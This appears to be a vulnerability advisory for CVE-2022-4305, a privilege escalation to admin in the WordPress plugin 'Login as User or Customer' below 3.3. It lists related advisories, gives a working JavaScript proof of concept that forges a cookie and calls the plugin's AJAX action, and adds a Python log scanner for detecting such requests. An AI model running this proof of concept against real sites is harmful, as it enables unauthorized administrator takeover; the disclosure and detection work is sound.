Unauthenticated Privilege Escalation to Admin via Login Vulnerability
| Title | Published | Views | Family |
|---|---|---|---|
| Login as User or Customer < 3.3 - Unauthenticated Privilege Escalation to Admin | 27 Dec 2022 00:00 | – | wpvulndb |
| Login as User or Customer < 3.3 - Privilege Escalation | 17 Oct 2023 07:20 | – | nuclei |
| CVE-2022-4305 | 23 Jan 2023 15:15 | – | nvd |
| CVE-2022-4305 | 23 Jan 2023 15:15 | – | cve |
| CVE-2022-4305 Login as User or Customer < 3.3 - Unauthenticated Privilege Escalation to Admin | 23 Jan 2023 14:31 | – | cvelist |
| Authorization | 23 Jan 2023 15:15 | – | prion |
Run the command below in the web browser's developer console while on the blog as an unauthenticated user, then reload the page to be logged in as the user with the ID set in the `loginas_old_user_id` cookie:
```js
document.cookie = "loginas_old_user_id=1";
fetch("/wp-admin/admin-ajax.php?action=loginas_return_admin", {
  "method": "GET",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));
```
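A defender-side check for the request shown above, as an added example that is not part of the original advisory or the plugin's code: it scans web-server access logs for calls to the `loginas_return_admin` AJAX action. Combined Log Format is assumed, the function name is hypothetical, and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumed format: Combined Log Format
# ip - user [time] "METHOD uri PROTO" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
ACTION = "loginas_return_admin"  # AJAX action named in the proof of concept


def find_loginas_hits(lines):
    """Return one record per request that calls the plugin's AJAX action.

    Limits: access logs normally hold neither cookies nor POST bodies, so the
    loginas_old_user_id cookie is not visible here and an action sent in a
    POST body is missed. Assumption: legitimate use of the plugin can produce
    the same request, so hits are triage leads, not verdicts.
    """
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a Combined Log Format line
        url = urlsplit(m["uri"])
        # unquote() so a percent-encoded path still matches
        if not unquote(url.path).endswith("/wp-admin/admin-ajax.php"):
            continue
        # parse_qs() percent-decodes values, so encoded action names match too
        if ACTION in parse_qs(url.query).get("action", []):
            hits.append({"ip": m["ip"], "time": m["time"],
                         "method": m["method"], "status": m["status"]})
    return hits


# Constructed sample lines (documentation IP ranges), not real traffic
SAMPLE = [
    '203.0.113.7 - - [27/Dec/2022:10:01:02 +0000] "GET /wp-admin/admin-ajax.php?action=loginas_return_admin HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [27/Dec/2022:10:01:05 +0000] "GET /wp-admin/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [27/Dec/2022:10:02:00 +0000] "GET /blog/wp-admin/admin-ajax.php?foo=1&action=loginas%5Freturn%5Fadmin HTTP/1.1" 302 0 "-" "curl/8.0"',
    '192.0.2.4 - - [27/Dec/2022:10:03:00 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 40 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_loginas_hits(SAMPLE):
        print(hit)
```

On sites still running a version below 3.3, any hit is worth correlating with admin-area requests from the same address shortly afterwards.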